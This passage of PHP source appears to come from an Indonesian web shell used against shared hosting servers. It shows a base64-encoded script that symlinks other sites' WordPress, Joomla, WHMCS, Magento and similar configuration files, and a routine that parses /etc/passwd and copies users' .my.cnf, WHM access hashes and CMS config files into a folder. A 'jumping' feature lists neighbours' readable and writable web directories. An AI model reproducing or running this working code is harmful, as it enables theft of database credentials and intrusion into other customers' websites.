Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
        $file = "nb_config/vhost.cin";
        $handle = fopen($file ,"w+");
        fwrite($handle ,base64_decode($vhost));
        fclose($handle);
        chmod($file, 0755);
        if(exe("cd nb_config && ./vhost.cin")) {
            echo "<center><a href='$link_config/nb_config'><font color=lime>Done</font></a></center>";
        } else {
            echo "<center><a href='$link_config/nb_config/vhost.cin'><font color=lime>Done</font></a></center>";
        }
 
    } else {
        $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
        while($passwd = fgets($etc)) {
            if($passwd == "" || !$etc) {
                echo "<font color=red>Can't read /etc/passwd</font>";
            } else {
                preg_match_all('/(.*?):x:/', $passwd, $user_config);
                foreach($user_config[1] as $user_idx) {
                    $user_config_dir = "/home/$user_idx/public_html/";
                    if(is_readable($user_config_dir)) {
                        $grab_config = array(
                            "/home/$user_idx/.my.cnf" => "cpanel",
                            "/home/$user_idx/.accesshash" => "WHM-accesshash",
                            "$user_config_dir/po-content/config.php" => "Popoji",
                            "$user_config_dir/vdo_config.php" => "Voodoo",
                            "$user_config_dir/bw-configs/config.ini" => "BosWeb",
                            "$user_config_dir/config/koneksi.php" => "Lokomedia",
                            "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
                            "$user_config_dir/clientarea/configuration.php" => "WHMCS",
                            "$user_config_dir/whm/configuration.php" => "WHMCS",
                            "$user_config_dir/whmcs/configuration.php" => "WHMCS",
                            "$user_config_dir/forum/config.php" => "phpBB",
                            "$user_config_dir/sites/default/settings.php" => "Drupal",
                            "$user_config_dir/config/settings.inc.php" => "PrestaShop",
                            "$user_config_dir/app/etc/local.xml" => "Magento",
                            "$user_config_dir/joomla/configuration.php" => "Joomla",
                            "$user_config_dir/configuration.php" => "Joomla",
                            "$user_config_dir/wp/wp-config.php" => "WordPress",
                            "$user_config_dir/wordpress/wp-config.php" => "WordPress",
                            "$user_config_dir/wp-config.php" => "WordPress",
                            "$user_config_dir/admin/config.php" => "OpenCart",
                            "$user_config_dir/slconfig.php" => "Sitelok",
                            "$user_config_dir/application/config/database.php" => "Ellislab");
                        foreach($grab_config as $config => $nama_config) {
                            $ambil_config = file_get_contents($config);
                            if($ambil_config == '') {
                            } else {
                                $file_config = fopen("nb_config/$user_idx-$nama_config.txt","w");
                                fputs($file_config,$ambil_config);
                            }
                        }
                    }      
                }
            }  
        }
    echo "<center><a href='?dir=$dir/nb_config'><font color=lime size=4>>> Done <<</font></a></center>";
    }
}  elseif($_GET['do'] == 'jumping') {
    $i = 0;
    echo "<div class='margin: 5px auto;'>";
    if(preg_match("/hsphere/", $dir)) {
        $urls = explode("
", $_POST['url']);
        if(isset($_POST['jump'])) {
            echo "<pre>";
            foreach($urls as $url) {
                $url = str_replace(array("http://","www."), "", strtolower($url));
                $etc = "/etc/passwd";
                $f = fopen($etc,"r");
                while($gets = fgets($f)) {
                    $pecah = explode(":", $gets);
                    $user = $pecah[0];
                    $dir_user = "/hsphere/local/home/$user";
                    if(is_dir($dir_user) === true) {
                        $url_user = $dir_user."/".$url;
                        if(is_readable($url_user)) {
                            $i++;
                            $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
                            if(is_writable($url_user)) {
                                $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
                            }
                            echo $jrw."<br>";
                        }
                    }
                }
            }
        if($i == 0) {
        } else {
            echo "<br>Total ada ".$i." Kamar di ".$ip;
        }
        echo "</pre>";
        } else {
            echo '<center>
                  <form method="post">
                  List Domains: <br>
                  <textarea name="url" style="width: 500px; height: 250px;">';
            $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
            while($getss = fgets($fp)) {
                echo $getss;
            }
            echo  '</textarea><br>
                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
                  </form></center>';
        }
    } elseif(preg_match("/vhosts|vhost/", $dir)) {
        preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
        $urls = explode("
", $_POST['url']);
        if(isset($_POST['jump'])) {
            echo "<pre>";
            foreach($urls as $url) {
                $url = str_replace("www.", "", $url);
                $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
                if(is_dir($web_vh) === true) {
                    if(is_readable($web_vh)) {
                        $i++;
                        $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
                        if(is_writable($web_vh)) {
                            $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
                        }
                        echo $jrw."<br>";
                    }
                }
            }
        if($i == 0) {
        } else {
            echo "<br>Total ada ".$i." Kamar di ".$ip;
        }
        echo "</pre>";
        } else {
            echo '<center>
                  <form method="post">
                  List Domains: <br>
                  <textarea name="url" style="width: 500px; height: 250px;">';
                  bing("ip:$ip");
            echo  '</textarea><br>
                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
                  </form></center>';
        }
    } else {
        echo "<pre>";
        $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
        while($passwd = fgets($etc)) {
            if($passwd == '' || !$etc) {
                echo "<font color=red>Can't read /etc/passwd</font>";
            } else {
                preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
                foreach($user_jumping[1] as $user_idx_jump) {
                    $user_jumping_dir = "/home/$user_idx_jump/public_html";
                    if(is_readable($user_jumping_dir)) {
                        $i++;
                        $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
                        if(is_writable($user_jumping_dir)) {
                            $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
                        }
                        echo $jrw;
                        if(function_exists('posix_getpwuid')) {
